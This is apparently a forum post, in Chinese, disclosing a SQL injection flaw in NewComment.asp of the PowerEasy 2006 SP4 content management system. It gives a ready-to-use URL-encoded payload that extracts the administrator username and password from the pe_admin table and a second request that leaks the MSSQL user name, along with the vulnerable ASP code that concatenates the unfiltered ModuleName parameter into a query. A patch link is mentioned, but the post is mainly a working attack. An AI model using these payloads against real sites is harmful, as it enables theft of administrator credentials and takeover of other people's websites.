动易2006 SP4版最新漏洞
漏洞发现:某牛人
漏洞文件:NewComment.asp
补丁下载:http://bbs.powereasy.net/dispbbs.asp?boardID=67&ID=280136&page=1
影响版本: 所有版本(包括免费版、商业SQL版及Access版)
爆管理员密码:
ChannelID=1; ModuleName=Article+A+on+C%2EInfoID%3DA% 2EArticleID+where+A%2EChannelID%3D1+and+1%3D1++And+%28Select+Top+1+char%28124%29%2BisNull%28cast%28%5Busername%5D+as+varchar%288000%29%29%2Cchar%2832%29%29%2Bchar%28124%29%2BisNull%28cast%28%5Bpassword%5D+as+varchar%288000%29%29%2Cchar%2832%29%29%2Bchar%28124%29+From+%28Select+Top+1%5Busername%5D%2C%5Bpassword%5D+From+%5Bpe%5Fadmin%5D+Where+1%3D1+Order+by+%5Busername%5D%2C%5Bpassword%5D%29+T+Order+by+%5Busername%5D+desc%2C%5Bpassword%5D+desc%29%3E0%2d%2d
在NewComment.asp文件中
ModuleName = Trim(request("ModuleName"))
这个ModuleName变量没过滤好,从而导致,我们可以在下面的SQL语句中构造我们的
SQL语句
If ModuleName <> "" Then
If ChannelID <> 0 Then
If ClassID <> 0 Then
sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & ModuleName & " A on C.InfoID=A." & ModuleName & "ID where A.ChannelID= " & ChannelID & " and A.ClassID= " & ClassID & " and C.Passed =" & PE_True
sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1
在A.ChannelID=1后就可以构造我们的SQL语句。(其中空格用+来代替。)
NewComment.asp?num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0--
例如这样就可以暴mssql用户名
剩下的就是sql注入老
姓名:Chinadu
还不错..